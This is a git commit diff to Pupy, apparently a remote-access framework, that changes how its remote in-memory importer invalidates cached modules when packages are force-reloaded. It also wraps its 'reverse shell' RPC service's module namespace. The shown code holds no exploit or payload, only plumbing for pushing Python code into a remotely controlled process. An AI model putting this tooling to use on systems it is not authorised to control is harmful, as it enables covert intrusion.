Properly invalidate cache during forced package loading

This commit is contained in:
Oleksii Shevchuk 2017-01-06 19:55:06 +02:00
parent 638a6469a1
commit 1a3ad7bb60
3 changed files with 50 additions and 22 deletions

View File

@ -31,7 +31,8 @@ try:
except ImportError: except ImportError:
builtin_memimporter = False builtin_memimporter = False
modules={} modules = {}
try: try:
import pupy import pupy
if not (hasattr(pupy, 'pseudo') and pupy.pseudo) and not modules: if not (hasattr(pupy, 'pseudo') and pupy.pseudo) and not modules:
@ -61,10 +62,21 @@ def pupy_add_package(pkdic):
module = cPickle.loads(pkdic) module = cPickle.loads(pkdic)
if __debug: if __debug:
print 'Adding package: {}'.format([ x for x in module.iterkeys() ]) print 'Adding files: {}'.format([ x for x in module.iterkeys() ])
modules.update(module) modules.update(module)
def has_module(name):
global module
return name in sys.modules
def invalidate_module(name):
global module
if not name in sys.modules:
raise ValueError('Module {} is not loaded yet'.format(name))
del sys.modules[name]
def native_import(name): def native_import(name):
__import__(name) __import__(name)
@ -83,6 +95,7 @@ class PupyPackageLoader:
dprint('loading module {}'.format(fullname)) dprint('loading module {}'.format(fullname))
if fullname in sys.modules: if fullname in sys.modules:
return sys.modules[fullname] return sys.modules[fullname]
mod=None mod=None
c=None c=None
if self.extension=="py": if self.extension=="py":
@ -132,17 +145,15 @@ class PupyPackageLoader:
'Error while loading package {} ({}) : {}'.format( 'Error while loading package {} ({}) : {}'.format(
fullname, self.extension, str(e))) fullname, self.extension, str(e)))
raise e raise e
finally: finally:
imp.release_lock() imp.release_lock()
mod = sys.modules[fullname] # reread the module in case it changed itself
return mod return sys.modules[fullname]
class PupyPackageFinder: class PupyPackageFinder:
def __init__(self, modules): def __init__(self, modules):
self.modules = modules self.modules = modules
self.modules_list=[
x.rsplit(".",1)[0] for x in self.modules.iterkeys()
]
def find_module(self, fullname, path=None): def find_module(self, fullname, path=None):
imp.acquire_lock() imp.acquire_lock()
@ -201,7 +212,9 @@ class PupyPackageFinder:
dprint('--> Loading {} ({}) package={}'.format( dprint('--> Loading {} ({}) package={}'.format(
fullname, selected, is_pkg)) fullname, selected, is_pkg))
return PupyPackageLoader(fullname, content, extension, is_pkg, selected) return PupyPackageLoader(fullname, content, extension, is_pkg, selected)
except Exception as e: except Exception as e:
raise e raise e
finally: finally:

View File

@ -113,6 +113,13 @@ REVERSE_SLAVE_CONF = dict(
instantiate_oldstyle_exceptions=True, instantiate_oldstyle_exceptions=True,
) )
class UpdatableModuleNamespace(ModuleNamespace):
__slots__ = ['__invalidate__']
def __invalidate__(self, name):
cache = self._ModuleNamespace__cache
if name in cache:
del cache[name]
class ReverseSlaveService(Service): class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """ """ Pupy reverse shell rpyc service """
@ -121,7 +128,8 @@ class ReverseSlaveService(Service):
def on_connect(self): def on_connect(self):
self.exposed_namespace = {} self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF) self._conn._config.update(REVERSE_SLAVE_CONF)
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule)) self._conn.root.set_modules(
UpdatableModuleNamespace(self.exposed_getmodule))
def on_disconnect(self): def on_disconnect(self):
print "disconnecting !" print "disconnecting !"
@ -179,7 +187,8 @@ class BindSlaveService(ReverseSlaveService):
self._conn.close() self._conn.close()
raise KeyboardInterrupt("wrong password") raise KeyboardInterrupt("wrong password")
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule)) self._conn.root.set_modules(
UpdatableModuleNamespace(self.exposed_getmodule))
def get_next_wait(attempt): def get_next_wait(attempt):

View File

@ -305,8 +305,16 @@ class PupyClient(object):
""" """
# start path should only use "/" as separator # start path should only use "/" as separator
if module_name in self.conn.modules.sys.modules and not force: update = False
return
pupyimporter = self.conn.modules.pupyimporter
if pupyimporter.has_module(module_name):
if not force:
return
else:
update = True
pupyimporter.invalidate_module(module_name)
start_path=module_name.replace(".", "/") start_path=module_name.replace(".", "/")
package_found=False package_found=False
@ -334,8 +342,6 @@ class PupyClient(object):
except Exception as e: except Exception as e:
raise PupyModuleError("Error while loading package from sys.path %s : %s"%(module_name, traceback.format_exc())) raise PupyModuleError("Error while loading package from sys.path %s : %s"%(module_name, traceback.format_exc()))
if "pupyimporter" not in self.conn.modules.sys.modules:
raise PupyModuleError("pupyimporter module does not exists on the remote side !")
if not modules_dic: if not modules_dic:
if self.desc['native']: if self.desc['native']:
@ -343,20 +349,20 @@ class PupyClient(object):
module_name, repr(self.get_packages_path()))) module_name, repr(self.get_packages_path())))
else: else:
try: try:
self.conn.modules.pupyimporter.native_import(module_name) pupyimporter.native_import(module_name)
except Exception as e: except Exception as e:
raise PupyModuleError("Couldn't find package {} in \(path={}) and sys.path / python = {}".format( raise PupyModuleError("Couldn't find package {} in \(path={}) and sys.path / python = {}".format(
module_name, repr(self.get_packages_path()), e)) module_name, repr(self.get_packages_path()), e))
if force or ( module_name not in self.conn.modules.sys.modules ): # we have to pickle the dic for two reasons : because the remote side is
self.conn.modules.pupyimporter.pupy_add_package(cPickle.dumps(modules_dic)) # we have to pickle the dic for two reasons : because the remote side is not aut0horized to iterate/access to the dictionary declared on this side and because it is more efficient # not aut0horized to iterate/access to the dictionary declared on this
logging.debug("package %s loaded on %s from path=%s"%(module_name, self.short_name(), package_path)) # side and because it is more efficient
if force and module_name in self.conn.modules.sys.modules: pupyimporter.pupy_add_package(cPickle.dumps(modules_dic))
self.conn.modules.sys.modules.pop(module_name) logging.debug("package %s loaded on %s from path=%s"%(module_name, self.short_name(), package_path))
logging.debug("package removed from sys.modules to force reloading") if update:
return True self.conn.modules.__invalidate__(module_name)
return False return True
def run_module(self, module_name, args): def run_module(self, module_name, args):
""" start a module on this unique client and return the corresponding job """ """ start a module on this unique client and return the corresponding job """